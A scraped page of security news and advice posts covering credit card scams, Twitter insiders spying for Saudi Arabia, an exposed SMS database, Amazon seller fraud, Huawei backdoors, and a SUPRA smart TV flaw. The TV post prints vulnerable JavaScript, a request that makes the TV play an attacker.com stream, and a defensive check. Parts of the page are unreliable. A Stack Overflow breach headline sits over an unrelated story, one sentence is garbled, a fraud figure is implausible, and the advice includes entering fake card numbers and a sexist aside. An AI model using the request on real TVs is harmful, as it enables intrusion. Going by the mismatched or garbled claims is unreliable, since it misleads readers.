5 Common Credit Card Scams That You Should Watch Out For!

Scams are on pretty much every corner of the planet! It's like they are a part of the economy. Scammers are everywhere, just waiting for an opening, and then they strike. Some scammers will do their heist personally. They just sit in their chair, use a computer with internet access, and can scam anybody as naïve as you. The scams I am about to share with you are credit card scams. Here are the five common credit card scams that you need to be aware of so you can easily avoid losing money.

A credit card scam is when hackers steal card information through one of several methods or schemes that a naïve victim falls for. Hackers have the high-tech knowledge to take third-party information such as your credit card details: your name, credit card number, the CVV code and expiration date. That is all the information needed to start using your credit card.

Scammers use the credit card to make legitimate purchases and payments online, or even to shop locally if they have copied your whole credit card. Hundreds if not thousands fall into the trap of these credit card scams.

You should be glad that banks are upgrading their security systems and providing their users a better and more secure banking experience, such as enabling two-factor authentication when buying something. They are also hiring investigators to detect when anyone tries to hack bank account information.

Here are the top 5 Credit Card Scams and How You Can Avoid Them


In 2019, more than $3 million worth of credit card scams was reported worldwide, and $2.7 million the year before. That only means that these scammers are getting better at what they do. Without further ado, here are the top 5 most common credit card scams, and we'll help you avoid them.

Credit card or save up to a certain extent when the person uses the card with proper safety. To this day, thousands of scams have taken place. Nowadays, people use credit cards in many places, such as when shopping online or purchasing online games. The hacker installs software on different websites, which provides them with all the information.

The Top Five Credit Card Scams

1. Fake Shopping Website


Hackers create their own shopping websites and offer various discounts to attract customers. This is one of the most common credit card scams that any user can run into.

The primary purpose of the website is to steal the card information of online shoppers. It is one of the simplest scams to set up, and many fall for it, especially women, where they are naïve about online hacking and scamming activities. Online payment technology has made payment easy but has also given rise to hacking.

Many people save their credit card information on a website to make future transactions easier. The team of hackers steals the collected data. Shoppers should prefer cash on delivery over using credit cards.

How to Avoid This Scam

Do not use your personal credit card when purchasing on an unknown shopping website. Use the cash on delivery method instead if they offer it. Otherwise, just forget about the website.

Before you use your personal credit card, try entering a fake credit card number and details first.

2. Fake WiFi Connections

Many hackers trace WiFi details and try to hack personal information. Always buy products from genuine websites using only a trusted internet connection, such as your own phone data or your own mobile internet device. Do not just connect to a free WiFi establishment, as you do not know who is reading the data you transmit.

Be attentive when choosing a WiFi network, because the wrong one may cause a significant loss to the account holder.

How to Avoid This Scam

This scam is pretty easy to avoid. Do not connect to any untrusted WiFi network, like the WiFi at your favorite café. If you have no choice and need to connect to it, just use it normally and do not buy anything online over that WiFi network. Browse the internet, check your social media accounts, update your Instagram account, etc. Just remember not to enter sensitive information such as your credit card details or login password.

3. Online Gaming Websites

Many people love playing games online. A lot of these games have their own monetary system: you buy in-game currency with real money and use it to purchase your favorite item or character in the game. Avid players are tempted to buy, and when they eventually do, they enter their credit card details to buy the game, credits or gold for their favorite game.

This method is fairly similar to the fake shopping website. Hackers target online gamers since some of them are just kids using their parents' credit cards, which makes them perfect victims.

How to Avoid This Scam

1. If you are reading this, you are most probably an adult with a credit card. Don't let anyone, and yes, that includes your kids, borrow your credit card, or hide it somewhere your kids cannot get to it.
2. Buy only on legitimate websites.

4. Phone Call Frauds


Phone call fraud is the simplest way to get information from the account holder. Hackers place a fake call and ask for the card details by drawing the victim into a bewildering conversation. Sometimes they lie to users that their account is about to be closed, then ask for credit card information to prevent that from happening, and the naïve victim provides it.

The victim has just handed over his or her credit card details, and minutes later finds out there has been $5,000 worth of online purchases made with the card.

How to Avoid This Scam

Never share any sensitive information from your credit card, even if the callers introduce themselves as someone from your bank. Even your bank will tell you not to share any information with any of its employees.

5. Game Account Hacking Scam

The scammer / hacker will hack a player's game ID and password. I don't know how they could hack your game profile, such as your Steam account, but assuming that they do, they will use your saved credit card details to make another game purchase and send those details to their own accounts. The same card details are used to purchase other games.

The hacker keeps using the card until the balance gets to zero. The young generation is more into online games, so they need to keep their card details safe.

How to Avoid This Scam

Avoid entering or saving credit card details when purchasing games from unknown sources.

Conclusion

Nowadays, one should be careful when making purchases with a credit card and should protect one's identity online. Many hackers have evolved and are better at what they do. Making fake websites is one thing: they are not only creating shopping websites but also making video games that attract kids. Some don't even need to leave their house to scam somebody. Children have the least knowledge of credit cards. Everyone should be responsible with their finances.

Taking care of your credit card is one of those responsibilities. Go here for more detailed tips and tricks to avoid credit card scams. I hope you learned something and enjoyed the read.

Two Former Employees of Twitter Caught Spying on Thousands of Accounts for Saudi Arabia

Recently, two former employees have been charged with spying on thousands of Twitter users' accounts on behalf of the Saudi Arabian government.

According to the indictment, one of the defendants is identified as Ahmad Abouammo, an American citizen who left Twitter in May 2015. The other is Ali Alzabarah, a Saudi Arabian citizen who left Twitter in December 2015. The two are accused of spying for the purpose of exposing the identities of non-conformists.

The two ex-employees were recruited in 2014 by Saudi government officials. Both have close ties with Mohammed bin Salman, the Saudi Crown Prince. They were hired to access sensitive, non-public information of Twitter accounts associated with known Saudi critics.

Email addresses, devices used, browser information, biographical information, birthdates and other information that can be used to determine a user's location, such as IP addresses, together with accounts and phone numbers, are just some of the information Abouammo and Alzabarah illegally accessed.

Alzabarah, one of the accused, joined Twitter in August 2013 as a “Site Reliability Engineer” and worked with the Saudi officials between May 21 and November 18, 2015. He allegedly accessed the private data of more than 6,000 Twitter accounts.

At least 33 users are included among the accounts he accessed. This made Saudi Arabian law enforcement submit emergency disclosure requests to Twitter.

Accordingly, Abouammo has also been separately charged with acting as a foreign agent and with handing the Federal Bureau of Investigation (FBI) falsified records to obstruct the federal investigation.

The criminal complaint says he provided the FBI with a falsified, backdated invoice charging an unnamed Saudi official $100,000 for “consulting services”.

Aside from spying on Twitter users, he is also charged with deleting specific information from social media platforms, revealing the identities of some users and shutting down Twitter accounts at the request of Saudi government officials.

According to the affidavit released by the FBI, Saudi officials paid Abouammo up to $300,000 to do the task. His work includes trying to cover up the payments with faked invoices for his personal needs and providing himself with a luxury Hublot watch worth $20,000.

Along with these two, another Saudi national, Ahmed al Mutairi, head of a Saudi social media company, was charged by the US Department of Justice for his involvement in the case. He is accused of acting as an intermediary between the two former Twitter employees and the Saudi government officials.

After being arrested by the FBI on Tuesday in Seattle, Abouammo is currently in US custody, while the remaining two suspects are believed to be in Saudi Arabia and still at large.

Twitter claimed that it cooperated in the investigation and that it limits access to sensitive account data to a limited group of vetted employees.

 “We understand the incredible risks faced by many who use Twitter to share their perspective with the world and to those in power accountable. We have tools in place to protect their privacy and their ability to do their vital work,”

Twitter said in the statement.

SUPRA Smart TV brand Vulnerability: Prone to Attackers

Television has evolved so much over the past few years, becoming more like a personal computer thanks to ever-advancing technologies. Now we have smart TVs! A lot of tech companies around the world manufacture smart TVs because, of course, people want innovation and new experiences on television.
But be careful, because these smart TVs are very prone to attackers.

Recently, Dhiraj Mishra shared his discovery of a vulnerability in one smart TV brand. The brand is SUPRA Smart TV, a lesser-known Russian electronics brand that distributes its products through Russia-, China- and UAE-based ecommerce. It offers a variety of devices, from audio and video equipment to household appliances (such as refrigerators, laundry machines and kitchen appliances) to car electronics.

SUPRA Smart TV was discovered to be vulnerable to an unpatched remote file injection flaw, which could allow attackers on the WiFi network to broadcast fake videos to the TV screen without any authentication. The vulnerability was found in the “openLiveURL” function of the SUPRA Smart TV. It could allow a local attacker to inject a remote file into the broadcast and play fake videos.

According to Mishra: “We are abusing `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability.”

Vulnerable code:

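    function openLiveTV(url)
    {
        // Passes the caller-supplied URL straight to the TV's media control
        // endpoint; no credential or token accompanies the request.
        $.get("/remote/media_control", {m_action:'setUri', m_uri:url, m_type:'video/*'},
            function (data, textStatus) {
                if ("success" == textStatus) {
                    alert(textStatus);
                } else {
                    alert(textStatus);
                }
            });
    }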

Vulnerable request:

    GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
    Host: 192.168.1.155
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1

Source: https://www.inputzero.io/2019/06/hacking-smart-tv.html

A significant requirement for an attacker to remotely control the SUPRA smart TV is first having access to the victim's WiFi network, so it is important not to share your WiFi password with anyone you do not know or trust, to change your password regularly, and to set a very strong password.
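A server-side check of the kind the endpoint above lacks, as an added example (not code from Mishra's write-up or from SUPRA's firmware): it authenticates the caller before looking at the URL and then accepts only allowlisted media hosts. The `x-pairing-token` header, the token value and the allowlisted host are assumptions made for illustration.

```javascript
// Added example: a hypothetical request gate for /remote/media_control.
// The header name, token and allowlist are assumptions, not SUPRA firmware.
const POLICY = {
  pairingToken: "constructed-pairing-token-0001", // constructed sample secret
  allowedSchemes: ["https:"],
  allowedHosts: ["streams.broadcaster.example"], // constructed allowlist
};

// The request shown on the page, reused as sample input.
const PAGE_REQUEST =
  "/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8";

// Compare secrets without an early exit, so timing does not reveal
// how many leading characters of a guess were correct.
function constantTimeEqual(a, b) {
  let diff = a.length ^ b.length;
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    diff |= (a.charCodeAt(i) || 0) ^ (b.charCodeAt(i) || 0);
  }
  return diff === 0;
}

const deny = (reason) => ({ allow: false, reason });

function checkMediaControl(requestTarget, headers = {}, policy = POLICY) {
  // Request targets are origin-form ("/path?query"), so parse against a dummy base.
  const req = new URL(requestTarget, "http://tv.invalid");
  if (req.pathname !== "/remote/media_control") return deny("wrong-endpoint");

  // 1. Authenticate first: an unpaired caller learns nothing about the URL policy.
  const token = headers["x-pairing-token"]; // hypothetical header
  if (typeof token !== "string" || !constantTimeEqual(token, policy.pairingToken)) {
    return deny("unauthenticated");
  }

  // 2. The page shows both m_action/m_uri and action/uri; accept either spelling.
  const q = req.searchParams;
  const action = q.get("m_action") ?? q.get("action");
  const uri = q.get("m_uri") ?? q.get("uri");
  if (action !== "setUri" || !uri) return deny("unsupported-action");

  // 3. Only play media from an allowlisted scheme and host.
  let media;
  try {
    media = new URL(uri);
  } catch {
    return deny("bad-uri");
  }
  if (!policy.allowedSchemes.includes(media.protocol)) return deny("scheme-not-allowed");
  if (!policy.allowedHosts.includes(media.hostname)) return deny("host-not-allowed");
  return { allow: true, reason: "ok", uri: media.href };
}
```

With this gate in front of the handler, the request shown above is rejected as unauthenticated, and a paired client is still limited to the allowlisted stream host.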

So imagine watching your favourite TV show with your kids when all of a sudden your smart TV screen switches to adult-rated shows. So disgusting, right? Or imagine watching your favourite news programme when a fake video of an emergency message comes up; it could cause so much panic. It is always important to choose trusted brands to help avoid these vulnerabilities and the compromise of your information.

Stack Overflow Q&A Platform Breach: Users’ Data Has Been Compromised

Bob Diachenko, a Cyber Threat Intelligence Director and journalist at SecurityDiscovery.com, has uncovered a massive SMS bombing operation that exposes millions of users' information.

You might be wondering why the uncovering of SMS bombing is so relevant. Let us start by explaining what SMS bombing is: it is basically sending duplicated text messages to several cellular phone users at a time. It uses a software program called an “SMS Bomber”, which is mostly used by legitimate companies for SMS marketing of products and services. However, these companies have their customers' consent to receive such text messages. In the case of this passwordless database, which was uncovered by Bob Diachenko on April 11th, the users' information might be used by hackers or fraudsters for illegal acts such as phishing.

According to the article Bob Diachenko published on SecurityDiscovery.com, he discovered an unprotected MongoDB instance named ApexSMS. This database holds millions of records relevant to SMS operations; in fact, according to Diachenko, one prominent folder contained an astounding 80,055,125 records.

The breached data contained in the database was as follows:

  • Hashed email
  • First and Last Name
  • City, State, Country and Zip Codes
  • IP Address
  • Phone Number
  • Carrier Network for Mobile
  • Line Type (Mobile or Landline)

Allegedly, the owners of this database may operate under the official cover of MobileDrip.com; however, this is not yet confirmed, since no response has been received from MobileDrip.com, whose website states:

“Mobile Drip is a cloud based SMS platform that’s optimized for high volume messaging with all the tracking, automation, segmentation, and data management features you need to maximize the profitability of your campaigns.”

They also indicated on their website that they will not knowingly engage in spam.

Legitimate companies mostly use SMS marketing, and MobileDrip.com clearly describes how automated SMS marketing works:

  • Attach drip campaigns to your lists and list segments to completely automate your sending.
  • Drip campaigns include the same features as broadcasting
  • Rotating Providers, Rotating Messages
  • Auto-replacing Domains
  • Segmenting data by carrier, gender, ethnicity, and location so you can optimize the messages you’re sending based on the leads
  • View stats for each message inside the drip campaigns
  • View drip message queue and history with stats on all messages.

On the other hand, Diachenko said that this information might be used to trick people into clicking on untrusted links or into other phishing schemes, which mostly victimize older people. This issue raises real concern about the security and protection of users' information, and it also affects the legitimate companies that use SMS marketing to send information to their customers.

With this, let us all be careful about believing the text messages we receive, especially those from an unknown number or source. Always make sure to validate first; it is OK to be doubtful sometimes, especially when you know that your information security is at stake.

Amazon Was Victimized By a Pervasive Fraud with Hackers Stealing Merchant Funds

The world's biggest online retail platform and ecommerce giant, Amazon Inc., was the victim of an extensive fraud from May to October of 2018, according to a U.K. legal document.

Amazon's lawyer said the company had already investigated the incident and asked a London judge to approve searches of the account statements into which hackers funneled the funds. Hackers were able to break into more than 100 seller accounts and siphoned cash from sales and loans directly to their own bank accounts, which were reported to be with Barclays Plc and Prepaid Technologies Ltd.

Amazon's legal counsel said that hackers may have used phishing techniques to obtain sellers' login credentials, thus giving them access to the accounts, and then changed the bank account information to their own. The investigation confirms that the first instance of hacking activity was on May 16, 2018.

Though it is unclear how much the hackers stole, Amazon said that it issued more than $1 billion in loans to merchants in 2018, which makes the incident more concerning since the amount of money involved might be in the millions. Amazon Inc. said that it will continue to enhance and develop its online systems to make sure these incidents do not happen again, and it is also sending a message to affected sellers, as well as to those who are not affected, to be very vigilant about phishing techniques.

In the court filing, Amazon's lawyers said that they need the documents “to investigate the fraud, identify and pursue the wrongdoers, locate the whereabouts of misappropriated funds, bring the fraud to an end and deter future wrongdoing.”

Barclays Plc in particular said that it has strict guidelines and a very sophisticated fraud system and will make sure the incident is dealt with accordingly. Both Barclays Plc and Prepaid Technologies are known to be associated with Mastercard Inc.

Amazon upholds its promise to its customers about the protection and security of their information. This follows another technical issue with its website that occurred before Black Friday last year, when customer names and email addresses were inadvertently posted to the website. That incident was taken care of swiftly: Amazon sent an email notification to the affected customers regarding the technical issue, which told them:

“Our website inadvertently disclosed your email address or name and email address due to a technical error. The issue has been fixed. This is not a result of anything you have done, and there is no need for you to change your password or take any other action. The impacted customers have been contacted. Amazon takes all security-related matters very seriously and your account security is our top priority. We have policies and security measures in place to ensure that your personal information remains secure.”

– Amazon sends out email to their affected customers.

Hidden Backdoors in Huawei-supplied Vodafone Equipment Found


The Huawei and Vodafone strategic partnership started in the last quarter of 2007, with Huawei Technologies Co. Ltd. supplying equipment such as routers to Vodafone. Since then, this strategic partnership has led to many other opportunities, including the recently announced 5G network project.

But as in the usual friendship stories, Huawei and Vodafone have faced some compromising situations.

Back in 2009, when Vodafone initially found some bugs in Huawei routers, the Chinese tech giant immediately took action and made sure that the issue was fixed. And true enough, business went back to usual. Hidden backdoors in Huawei devices are rampant and have been criticized by the United States.

But according to a Bloomberg report, in 2011 and 2012 Vodafone found some backdoors in the Huawei equipment. In particular, in 2011, Vodafone Italy revealed that, upon further penetration testing and checking, backdoors were identified in parts of its fixed access network known as optical service nodes, which are responsible for transmitting internet connections over optical fibers. In 2012, another backdoor was identified in other parts called broadband network gateways, which are responsible for user authentication and access to the internet. According to reports, these vulnerabilities were also present in the United Kingdom, Spain, Portugal and Germany.

Backdoors Are Their Entry Point for Committing Cybersecurity Crimes


A backdoor, in cybersecurity terms, is something like a hidden program that bypasses security controls to access systems. Backdoors have actually been common in software for legitimate uses, for example, letting manufacturers restore users' passwords.

Thus, this issue raises concern about potential unauthorized access to users' information. But both Vodafone and Huawei gave assurances that these vulnerabilities were resolved the same year they were discovered. Hidden backdoors in Huawei equipment are blatantly used by some hackers.

The United States, on the other hand, alongside some other countries, has already banned Huawei products due to security concerns. Joining the United States were Australia, Japan and Taiwan.

The ban from the United States was based on the Trump administration's allegations that this equipment might invite espionage by the Chinese state, and the administration is trying to persuade other Western countries to block Huawei's equipment as well. Canada and New Zealand were the most likely to follow. But the Chinese tech giant Huawei has denied the allegations, saying that it has nothing to do with the Chinese government.

With this, Vodafone, Europe's largest telecommunications company, said that it opposes the banning of Huawei's equipment, saying that Washington should prove its allegations. This comes amid the race for 5G network technology projects, for which Huawei and Vodafone signed a strategic partnership. Europe is Huawei's largest market outside China.

According to the company statement from Vodafone,

“In the telecoms industry it is not uncommon for vulnerabilities in equipment from suppliers to be identified by operators and other third parties, Vodafone takes security extremely seriously and that is why we independently test the equipment we deploy to detect whether any such vulnerabilities exist. If a vulnerability exists, Vodafone works with that supplier to resolve it quickly.”

Vodafone

On the other hand, Huawei issued a statement saying: “Like every ICT vendor we have a well-established public notification and patching process, and when a vulnerability is identified we work closely with our partners to take the appropriate corrective action.”